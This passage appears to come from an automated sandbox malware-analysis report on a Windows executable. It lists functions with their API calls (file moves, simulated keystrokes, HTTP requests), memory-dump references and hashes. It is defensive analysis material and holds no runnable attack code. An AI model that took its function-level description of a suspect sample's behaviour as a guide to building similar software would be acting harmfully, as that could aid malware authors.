                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00453893 Relevance: 13.7, APIs: 9, Instructions: 158filestringCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                                                                                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                                                                                                                                                                                                                                                                                                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 978794511-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00441165 Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00445E52 Relevance: 13.6, APIs: 9, Instructions: 69sleepkeyboardwindowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00445AA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00445AC7
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00445AA7: GetCurrentThreadId.KERNEL32 ref: 00445ACE
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00445AA7: AttachThreadInput.USER32(00000000), ref: 00445AD5
                                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445E6F
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00445E88
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445E96
                                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445E9C
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00445EBD
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000), ref: 00445ECB
                                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445ED1
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00445EE6
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445EEE
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2014098862-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 5ca03ddf5c5627d7609a553b695717aade5f72ce3845e2189486292beca2fa90
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 3cb45b36699f005c3339592b7719367c9fd6f04972b18b3a4454280c1561912d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ca03ddf5c5627d7609a553b695717aade5f72ce3845e2189486292beca2fa90
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44115671390300BBF6209B959D8AF5A775DEB98B11F20490DFB80AB1C1C5F5A4418B7C
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00432704 Relevance: 13.5, APIs: 9, Instructions: 42COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ClearVariant
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045EA0F Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                                                                                                                                                                                                                                                                                                                                                                                                • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                                                                                                                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32 ref: 0045EA6D
                                                                                                                                                                                                                                                                                                                                                                                                                                • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 0045EC33
                                                                                                                                                                                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: %4d%02d%02d%02d%02d%02d
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2441338619-1568723262
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004091B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: @COM_EVENTOBJ
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 327565842-2228938565
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00401CB0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 240COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00426F50
                                                                                                                                                                                                                                                                                                                                                                                                                                • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                                                                                                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                                                                                                                                                                                                                                                                                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: close all
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4174999648-3243417748
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044AA86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174networkCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                                                                                                                                                                                                                                                                                                                                                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                                                                                                                                                                                                                                                                                                                                                                                                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                                                                                                                                                                                                                                                                                                                                                                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                                                                                                                                                                                                                                                                                                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                                                                                                                                                                                                                                                                                                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1291720006-3916222277
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045FBAC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                                                                                                                                                                                                                                                                                                                                                                                                • IsMenu.USER32(?), ref: 0045FC5F
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 0045FC97
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                                                                                                                                                                                                                                                                                                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
